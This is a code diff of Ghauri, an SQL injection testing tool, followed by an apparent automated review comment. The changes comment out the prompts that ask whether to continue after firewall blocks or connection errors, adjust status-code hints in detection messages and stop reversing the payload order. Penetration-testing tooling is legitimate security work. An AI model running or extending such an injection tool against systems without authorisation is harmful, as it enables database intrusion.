    1317 1331   
    1318 1332   def fetch_using_error_based_vector(
    skipped 54 lines
    1373 1387   if error_based_in_vectors:
    1374 1388   vector = conf.vectors.get("error_vector")
    1375 1389   while start < end:
    1376  - if http_firewall_code_counter > 2:
    1377  - message = f"{error_msg} - {http_firewall_code_counter} time(s)"
    1378  - logger.warning(f"HTTP error code detected during run:")
    1379  - choice = logger.read_input(
    1380  - f"{message}. how do you want to proceed? [(C)continue/(q)uit] ",
    1381  - batch=False,
    1382  - user_input="C",
    1383  - )
    1384  - if choice == "q":
    1385  - logger.error("user quit")
    1386  - logger.end("ending")
    1387  - exit(0)
    1388  - if choice == "c":
    1389  - http_firewall_code_counter = 0
    1390  - if retry_on_error >= retry:
    1391  - logger.warning(f"Ghauri detected connection errors multiple times")
    1392  - choice = logger.read_input(
    1393  - f"how do you want to proceed? [(C)continue/(q)uit] ",
    1394  - batch=False,
    1395  - user_input="C",
    1396  - )
    1397  - if choice == "q":
    1398  - logger.error("user quit")
    1399  - logger.end("ending")
    1400  - exit(0)
    1401  - if choice == "c":
    1402  - retry_on_error = 0
     1390 + # if http_firewall_code_counter > 2:
     1391 + # message = f"{error_msg} - {http_firewall_code_counter} time(s)"
     1392 + # logger.warning(f"HTTP error code detected during run:")
     1393 + # choice = logger.read_input(
     1394 + # f"{message}. how do you want to proceed? [(C)continue/(q)uit] ",
     1395 + # batch=False,
     1396 + # user_input="C",
     1397 + # )
     1398 + # if choice == "q":
     1399 + # logger.error("user quit")
     1400 + # logger.end("ending")
     1401 + # exit(0)
     1402 + # if choice == "c":
     1403 + # http_firewall_code_counter = 0
     1404 + # if retry_on_error >= retry:
     1405 + # logger.warning(f"Ghauri detected connection errors multiple times")
     1406 + # choice = logger.read_input(
     1407 + # f"how do you want to proceed? [(C)continue/(q)uit] ",
     1408 + # batch=False,
     1409 + # user_input="C",
     1410 + # )
     1411 + # if choice == "q":
     1412 + # logger.error("user quit")
     1413 + # logger.end("ending")
     1414 + # exit(0)
     1415 + # if choice == "c":
     1416 + # retry_on_error = 0
    1403 1417   entry = payloads[start]
    1404 1418   response_string = ""
    1405 1419   if delay > 0:
    skipped 259 lines
    1665 1679   vector_type=vector_type,
    1666 1680   )
    1667 1681   if length == 0:
    1668  - logger.debug(
     1682 + logger.warning(
    1669 1683   "it was not possible to extract query output length for the SQL query provided."
    1670 1684   )
    1671 1685   continue
    skipped 655 lines
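--- a/ghauri/core/tests.py
+++ b/ghauri/core/tests.py
@@ -666,7 +666,8 @@
 with_status_code = attack.status_code
 if attack.status_code != attack01.status_code:
 is_different_status_code_injectable = True
-with_status_code_msg = f" (with --code={with_status_code})"
+if attack.status_code != 200:
+with_status_code_msg = f" (with --code={with_status_code})"
 if attack.status_code in [403, 406]:
 logger.debug(
 f"{attack.error_msg} HTTP error codes detected. ghauri is going to retry in few seconds.."
@@ -1154,7 +1155,8 @@
 f" (with error ReadTimeout on --timeout={timeout})"
 )
 else:
-with_status_code_msg = f" (with --code={with_status_code})"
+if attack.status_code != 200:
+with_status_code_msg = f" (with --code={with_status_code})"
 if attack.status_code in [403, 406] and code and code not in [403, 406]:
 logger.debug(
 f"{attack.error_msg} HTTP error code detected. ghauri is going to retry."
@@ -1299,7 +1301,7 @@
 error_based_payloads = get_payloads_with_functions(
 error_based_payloads, backend=dbms, possible_dbms=possible_dbms
 )
-error_based_payloads.reverse()
+# error_based_payloads.reverse()
 for entry in error_based_payloads:
 backend = entry.dbms
 index_of_payload = 0
@@ -1414,7 +1416,8 @@
 with_status_code = attack.status_code
 if attack.status_code != base.status_code:
 is_different_status_code_injectable = True
-with_status_code_msg = f" (with --code={with_status_code})"
+if attack.status_code != 200:
+with_status_code_msg = f" (with --code={with_status_code})"
 if attack.status_code in [403, 406] and code and code not in [403, 406]:
 logger.critical(
 f"{attack.error_msg} HTTP error code detected. ghauri is going to retry."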
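Review bot: The new `if attack.status_code != 200:` guard (new-side lines 669, 1158 and 1419 of tests.py) suppresses the `--code` hint while `is_different_status_code_injectable = True` is still set, so when the status-code difference is what drove the detection and the attack response happens to be 200 against a non-200 base, the user is told the parameter is injectable but no longer which `--code` value reproduces it. If the intent is only to stay quiet when the attack status equals the tool's default, the literal `200` should become a named constant compared against that default; otherwise also testing the base side (`attack01.status_code` in the first hunk, `base.status_code` in the last) keeps the hint in the asymmetric case, e.g. `if attack.status_code != 200 or base.status_code != 200:`. The `# error_based_payloads.reverse()` line at 1304 should be deleted rather than left commented out, or carry a one-line comment explaining why payload order no longer needs reversing. Each of these hunks sits inside a function whose start and end are outside the hunk.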